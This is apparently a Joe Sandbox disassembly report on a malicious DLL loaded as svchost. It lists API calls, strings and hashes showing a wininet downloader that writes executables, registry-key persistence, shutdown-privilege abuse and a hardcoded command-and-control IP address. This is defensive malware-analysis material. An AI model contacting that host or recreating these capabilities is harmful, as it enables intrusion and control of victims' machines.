                                                                                                                • Opcode Fuzzy Hash: 02807cd9fc2c2d172a8d2777ce926d73bc9f3961fff41b6754e738332fe71101
                                                                                                                • Instruction Fuzzy Hash: 39F096B610912A7FF1106771ECCCDBF7E6DDB4E2D6B120428F5055600ECF2658418571
                                                                                                                Function 1000358C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 100035C9
                                                                                                                • wsprintfA.USER32 ref: 100035DE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$FreeInfoLoadSystemwsprintf
                                                                                                                • String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                                                • API String ID: 86330591-2169120903
                                                                                                                • Opcode ID: dc211f4c5e3334b9a75a581acafed69773f2644d7a1948e9a9c8f06f08de0db5
                                                                                                                • Instruction ID: e0e52339f3a0edf701dd4b0822ed73eda2d577ef34cae91861143d544cce4ff8
                                                                                                                • Opcode Fuzzy Hash: dc211f4c5e3334b9a75a581acafed69773f2644d7a1948e9a9c8f06f08de0db5
                                                                                                                • Instruction Fuzzy Hash: 93F054B1900149BFFB04DBE8CD05DEEBB6DDB1C144F200464FB01F5055E6629A148766
                                                                                                                Function 10003D5D Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,00000000,?,?,100039AB,00000000), ref: 10003D99
                                                                                                                • free.MSVCRT ref: 10003DA8
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,100039AB,00000000), ref: 10003DBE
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,100039AB,00000000), ref: 10003DC6
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 10003DCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$Heap$LibraryProcessVirtualfree
                                                                                                                • String ID:
                                                                                                                • API String ID: 831075735-0
                                                                                                                • Opcode ID: 667178307696715c23ee8a0b861fe9ca313d72f521eb66f714d6403ad810cf37
                                                                                                                • Instruction ID: 71511c0ad6a298159b0eec715adc94005effd13d7d75cd72595928e5cffca51a
                                                                                                                • Opcode Fuzzy Hash: 667178307696715c23ee8a0b861fe9ca313d72f521eb66f714d6403ad810cf37
                                                                                                                • Instruction Fuzzy Hash: DC01ED72500611AFE7219FA5DCC895BB7EDFB443A1311892EF19A93554C731BC45CB50
                                                                                                                Function 100025A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17shutdownCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10004666: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege), ref: 1000467E
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000468E
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 10004699
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100046A4
                                                                                                                  • Part of subcall function 10004666: LoadLibraryA.KERNEL32(kernel32.dll,?,SeShutdownPrivilege), ref: 100046AE
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100046B9
                                                                                                                  • Part of subcall function 10004666: LoadLibraryA.KERNEL32(KERNEL32.dll,?,SeShutdownPrivilege), ref: 10004701
                                                                                                                  • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 10004709
                                                                                                                  • Part of subcall function 10004666: CloseHandle.KERNEL32(?,?,SeShutdownPrivilege), ref: 10004718
                                                                                                                  • Part of subcall function 10004666: FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004729
                                                                                                                  • Part of subcall function 10004666: FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004734
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 100025B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                • API String ID: 3789203340-3733053543
                                                                                                                • Opcode ID: e4fba66ba179fd9c90d11779b271753c7a602678899a700a7ffa0e43bc127d12
                                                                                                                • Instruction ID: 24361d1f74b491916104d0b65e9654eb6268adfd09238d66ad51a9c89c1c7c7a
                                                                                                                • Opcode Fuzzy Hash: e4fba66ba179fd9c90d11779b271753c7a602678899a700a7ffa0e43bc127d12
                                                                                                                • Instruction Fuzzy Hash: 55D0C93614D7203AF6259310FC07F891386DB46A60F32005AF100281D9EE97394101DE
                                                                                                                Function 10004822 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 183libraryloaderstringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 10004857
                                                                                                                • memset.MSVCRT ref: 1000486A
                                                                                                                • memset.MSVCRT ref: 10004878
                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                • GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                • GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                • strchr.MSVCRT ref: 10004991
                                                                                                                • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A3F
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$FreeLoadlstrcpystrchr
                                                                                                                • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                                                                                                                • API String ID: 3659255042-2913591164
                                                                                                                • Opcode ID: 7424f0aa0fc5f41e5269731e09dcfb498a038a30a4bf35bef428207efb807e24
                                                                                                                • Instruction ID: 7827c6d97ea14ff7f97f876e2ede93deda3ff4f1abfb71c7f8a3dc5e2b71a7d8
                                                                                                                • Opcode Fuzzy Hash: 7424f0aa0fc5f41e5269731e09dcfb498a038a30a4bf35bef428207efb807e24
                                                                                                                • Instruction Fuzzy Hash: 3761F9B190111DABEF21DFA0CD84EEFBBB9FB49390F1101A6F609A2114DB319E548F65
                                                                                                                Function 100027BC Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 180stringprocessCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$lstrcatstrrchrstrstr$CreateEnvironmentExpandProcessStringslstrcpystrcpystrlenstrncpywsprintf
                                                                                                                • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                                                • API String ID: 4079107157-33419044
                                                                                                                • Opcode ID: 04d3fabc052defb42953b4d487a01b0e0a3a75e7128b93fa4fdb2158ee315547
                                                                                                                • Instruction ID: 1dae266835ad86fc393f082bb566385ae5bfce16840cf251a65e311cd9e83007
                                                                                                                • Opcode Fuzzy Hash: 04d3fabc052defb42953b4d487a01b0e0a3a75e7128b93fa4fdb2158ee315547
                                                                                                                • Instruction Fuzzy Hash: 86514FB690062DBFFB10CBE0CD89EDF777CEB05395F1044A6F604E6144DA719A498BA0
                                                                                                                Function 10004666 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 84libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege), ref: 1000467E
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000468E
                                                                                                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 10004699
                                                                                                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100046A4
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,SeShutdownPrivilege), ref: 100046AE
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100046B9
                                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.dll,?,SeShutdownPrivilege), ref: 10004701
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 10004709
                                                                                                                • CloseHandle.KERNEL32(?,?,SeShutdownPrivilege), ref: 10004718
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004729
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004734
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                                                                                • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                                                                                                                • API String ID: 2887716753-2040270271
                                                                                                                • Opcode ID: 2c02e0a2dce957ed4b170e4857a5501a8461009b11209441a4d50c6b9b6a2af3
                                                                                                                • Instruction ID: 8d4d7167a0abf61afb389703d9ccc16411aa1da686c4766c6b67e9c280f51853
                                                                                                                • Opcode Fuzzy Hash: 2c02e0a2dce957ed4b170e4857a5501a8461009b11209441a4d50c6b9b6a2af3
                                                                                                                • Instruction Fuzzy Hash: DD2148B1D04218BAEB01EBF58C48FEFBFB8EF48391F114465E605E2144DB759A448BA0
                                                                                                                Function 10004529 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 115libraryloaderfileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 108 10004529-10004576 LoadLibraryA GetProcAddress 110 10004597-10004599 108->110 111 10004578-10004595 GetProcAddress 108->111 112 100045a2-100045a4 110->112 113 1000459b-1000459c FreeLibrary 110->113 111->110 116 100045a9-100045c3 CreateFileA 111->116 115 10004661-10004665 112->115 113->112 117 100045c5 116->117 118 10004637-10004655 Sleep GetProcAddress 116->118 119 100045ca-100045f9 memset GetProcAddress 117->119 125 10004657-10004658 FreeLibrary 118->125 126 1000465e 118->126 123 10004606-10004624 WriteFile 119->123 124 100045fb-10004604 119->124 128 10004626 123->128 129 1000462b-10004634 CloseHandle 123->129 124->123 127 10004628 124->127 125->126 126->115 127->129 128->119 129->118
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(wininet.dll,?,00000001,00000000), ref: 1000454D
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004564
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000457E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 1000459C
                                                                                                                • CreateFileA.KERNEL32(10002CDC,40000000,00000000,00000000,00000002,00000000,00000000,?,00000001,00000000), ref: 100045B7
                                                                                                                • memset.MSVCRT ref: 100045D3
                                                                                                                • GetProcAddress.KERNEL32(10002CDC,InternetReadFile), ref: 100045E3
                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000001,00000000), ref: 1000461B
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000001,00000000), ref: 1000462E
                                                                                                                • Sleep.KERNEL32(00000001,?,00000001,00000000), ref: 10004639
                                                                                                                • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10004645
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 10004658
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWritememset
                                                                                                                • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$MZ$wininet.dll
                                                                                                                • API String ID: 2364563185-3604101231
                                                                                                                • Opcode ID: 4ccd4711cf4494772635a2f590ae23fe1c53700288b07bfeed38bb136e3ef3db
                                                                                                                • Instruction ID: cfdd7e431f84bb68211a12104eaec753c658bf1fa5ec063c49e3443a626c7788
                                                                                                                • Opcode Fuzzy Hash: 4ccd4711cf4494772635a2f590ae23fe1c53700288b07bfeed38bb136e3ef3db
                                                                                                                • Instruction Fuzzy Hash: 0E3149B180011CBEEB109FA0CC84EEFBFB9EB483D5F118069F605A2154DB365E858AA5
                                                                                                                Function 10002D9E Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136synchronizationsleepstringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 10002DA3
                                                                                                                • wsprintfA.USER32 ref: 10002DD0
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10002DE4
                                                                                                                • GetLastError.KERNEL32 ref: 10002DF0
                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 10002DFE
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10002E05
                                                                                                                • rand.MSVCRT ref: 10002E28
                                                                                                                • Sleep.KERNEL32 ref: 10002E37
                                                                                                                • lstrcatA.KERNEL32(00000000,119.91.152.151), ref: 10002E60
                                                                                                                • strcmp.MSVCRT ref: 10002E72
                                                                                                                • GetTickCount.KERNEL32 ref: 10002E8A
                                                                                                                • GetTickCount.KERNEL32 ref: 10002EA6
                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,00002081), ref: 10002F0F
                                                                                                                • Sleep.KERNEL32(000001F4), ref: 10002F1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountMutexSleepTick$CloseCreateErrorH_prologHandleLastObjectReleaseSingleWaitlstrcatrandstrcmpwsprintf
                                                                                                                • String ID: %s:%d:%s$119.91.152.151$SySyeu
                                                                                                                • API String ID: 4065721159-4228222833
                                                                                                                • Opcode ID: a5af5a3d6a9359322f04e457a363fbda1204055e8f71d46e8cb9e8ff8e7e396c
                                                                                                                • Instruction ID: 0aef3fa4da984b37d72cd036fbc76a84f9d8f20caef5abb9300e459f48f97b0e
                                                                                                                • Opcode Fuzzy Hash: a5af5a3d6a9359322f04e457a363fbda1204055e8f71d46e8cb9e8ff8e7e396c
                                                                                                                • Instruction Fuzzy Hash: 4F41A8358042A5ABFB15DBB4CC88BDE7BB9EF093C0F1040A5E509E3199DF716A44CB51
                                                                                                                Function 10004A93 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 144libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 171 10004a93-10004b1b LoadLibraryA GetProcAddress * 6 172 10004b79-10004b95 171->172 173 10004b1d-10004b1e 171->173 175 10004b97-10004bac 172->175 179 10004bf4-10004bff call 10004c1f 172->179 174 10004b20-10004b21 173->174 173->175 177 10004b53-10004b68 174->177 178 10004b23-10004b24 174->178 175->179 183 10004bae-10004bb3 175->183 177->179 188 10004b6e-10004b77 177->188 178->179 180 10004b2a-10004b3f 178->180 189 10004c01-10004c02 FreeLibrary 179->189 190 10004c08-10004c19 179->190 180->179 191 10004b45-10004b4e 180->191 183->179 187 10004bb5-10004bb8 183->187 192 10004bd0-10004bde lstrlenA 187->192 193 10004bba-10004bbd 187->193 200 10004be9-10004beb 188->200 189->190 191->200 196 10004bdf-10004be3 192->196 194 10004bc6-10004bce 193->194 195 10004bbf-10004bc2 193->195 194->196 195->192 199 10004bc4 195->199 196->200 199->179 200->179 201 10004bed 200->201 201->179
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
                                                                                                                • API String ID: 2449869053-3188892968
                                                                                                                • Opcode ID: b9fec3eb9a562a6a9266f8090f520ea499f34599839294b39172511a198aaae8
                                                                                                                • Instruction ID: 2058804bda021c861d2603192b8c2d3dc199326d0aa42d29f4cfa0892e9c0375
                                                                                                                • Opcode Fuzzy Hash: b9fec3eb9a562a6a9266f8090f520ea499f34599839294b39172511a198aaae8
                                                                                                                • Instruction Fuzzy Hash: E741E3B1900259BFFF11DF94DC84EEEBAB9FB08695F114026FA24A2168DB318C159B64
                                                                                                                Function 10001603 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 181COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 10001608
                                                                                                                • memcmp.MSVCRT(?,?,00000003,00000000,00000000,00002000), ref: 10001635
                                                                                                                • memcpy.MSVCRT(00000003,00000000,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 1000169E
                                                                                                                • memcmp.MSVCRT(00000003,00000003,00000003,00000003,00000000,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 100016AD
                                                                                                                • _CxxThrowException.MSVCRT(?,10005370), ref: 100016C9
                                                                                                                • memcpy.MSVCRT(?,00000000,00000004,00000003,00000000,?,00000003,00000000,00000000,00002000), ref: 100016E1
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 10001743
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?,00000003,00000000), ref: 1000174F
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017A7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017B0
                                                                                                                • _CxxThrowException.MSVCRT(?,10005370), ref: 100017CD
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,10005370,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017DC
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,10005370,?,00000004,?,00000004,?,00000004,00000003,00000003,?,?,00000003,00000000,?), ref: 100017EA
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$??2@memcpy$ExceptionThrowmemcmp$H_prolog
                                                                                                                • String ID: P`$``
                                                                                                                • API String ID: 1493374972-3525061398
                                                                                                                • Opcode ID: 10262e34717a2dc6bb8153166a79431bc9c49f8163c052bb3b4c512cb2356511
